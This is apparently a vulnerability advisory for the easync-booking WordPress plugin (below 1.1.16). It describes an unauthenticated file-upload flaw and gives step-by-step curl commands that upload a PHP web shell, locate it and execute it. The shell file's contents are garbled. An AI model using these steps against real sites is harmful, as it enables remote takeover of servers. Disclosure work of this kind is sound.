The plugin suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.
1. Create a malicious PHP file: echo β /tmp/evil.php 2. Upload it curl -H βCookie: PHPSESSID=a0d5959357e474aef655313f69891f37β \ -F βaction=easync_session_storeβ \ -F βtype=carβ \ -F βwith_driver=self-drivenβ \ -F βdriver_license_image2=@/tmp/evil.phpβ \ βhttp://127.0.0.1/wp-admin/admin-ajax.phpβ 3. Determine the location where the shell has been uploaded (the βd_license_imageβ should contain the URL to it): curl -H βCookie: PHPSESSID=a0d5959357e474aef655313f69891f37β \ βhttp://127.0.0.1/wp-admin/admin-ajax.php?action=easync_success_and_saveβ 4. Trigger the payload by accessing the determined URL, e.g: http://127.0.0.1/wp-content/uploads/cff7779bf2268f97c011ece9fd4c9ab0.php
CPE | Name | Operator | Version |
---|---|---|---|
easync-booking | lt | 1.1.16 |